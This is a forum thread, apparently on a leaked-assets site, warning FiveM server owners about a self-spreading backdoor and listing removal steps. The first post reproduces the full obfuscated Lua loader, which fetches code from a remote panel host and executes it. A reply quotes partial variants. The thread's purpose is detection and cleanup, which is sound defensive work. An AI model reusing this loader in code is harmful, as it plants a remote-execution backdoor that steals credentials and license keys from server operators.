• We have a new discord! click here to join
    Any faulty links ? Report them in our discord or via our Ticket System!
    We do everything we can to protect the safety of our visitors, if any resource contains malware in any kind of form or obfuscation please report it aswell ♡♡

    Payments via Crypto: Please open a ticket, if you experience any issues, or if you miss your coin as an option in the list we have alot of wallets available.

Find Malware/Viruses in your assets, or leaked assets (1 Viewer)

milanwillet

Active member
Dec 4, 2023
80
31
18
Credits
1,593
What this Malware/RAT doing ?
it generates obfuscated shit code like this :


local llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x54\x48\x4a\x58\x67\x37", function (mMXHvjYgMEtGKcHqzKgfgEIRqKBgXRKwKfMaUTsiIbVjqVAIeJlcSKEMRZerHZUwyHKDxv, aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL) if (aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL == llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[6] or aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL == llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[5]) then return end llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[2]](llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[3]](aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL))() end)

in every .lua file in your server also After this shit code is run, it will upload some javascript and override existing files within the system builders directory.

resources\[system]\[builders] <---- if you dont have this directory i wiil tell you what you can do to remove the malware

The code will start propagating itself within all of your resources and files within the FiveM server installation to make it difficult to remove.


At this stage, its armageddon and all files within the server are compromised meaning files can be downloaded, uploaded, edited and viewed, including but not limited to just the server.cfg, sql credentials or even steal your cfx license keys. They’re also able to run remote code on the server which leads to the last step. The MalScanner batch file in this repository aims to show you exactly where the infected code is.
HOW TO REMOVE IT ?

1. Import all the resources files in to your visual studio like this :
1674348038524.png


(Select your resources folder only!)
1674348121206.png

First Step DONE

2. Stop Your Server Clear your Cache and Search about this : = {"\


How to check all resources?
simple do as i will show you in picture
1674348345837.png

1674348374351.png


remove every kind of local llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY =

3. DELETE The following resources because this shit overwrite the js files of this resources :
1) xsound
2) webpack
3) yarn

4. Redownload the resources from here :
FOR YARN AND WEBPACK : cfx-server-data/resources at master · citizenfx/cfx-server-data
FOR XSOUND : GitHub - Xogy/xsound: Improved audio library for FiveM

5 Be sure you dont have any kind of local llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY = {"\ (the its random for every victim this is just an example)
in your resources because it will spread again and again and again

I have supplied two tools, one is a malware scanner that can searches for obfuscated code like above, just place it in your resources folder and run as administrator, and the network block if for vps/homehosted, once run it will block network connection to the known panels these hackers use to ruin your assets

6. Start Your server !
 

Attachments

  • MalScanner.rar
    997 bytes · Views: 48

leaks4ever

Active member
God VIP
Jun 11, 2023
152
12
18
Credits
398
⚠️Update this post⚠️:

local tRThqOBgMbtFexNnFcNDZnrlVSKInPoStSPWYGePmyybWSuonqViBEpnfLTXRsNDghAamW = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74",

local bPONongFTdvYbmSYWxNLEaXZCxywuNEcypwOkhxkpkMoEENjDEqPNGTjyQLIPGnGtPQzrI = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65",


You don't need the full code... 👆

And the codes are always different for different people
so these codes will probably not find them....

This will be generated at the end of your scripts.
And they stop working if you didn't use mysql-async
👇

server_scripts { '@mysql-async/lib/MySQL.lua' }


DELETE The following resources because this shit overwrite the js files of this resources :
1) xsound
2) webpack
3) yarn
4) screenshot-basic
 
  • Post hidden due to user being banned.

Users who are viewing this thread

Top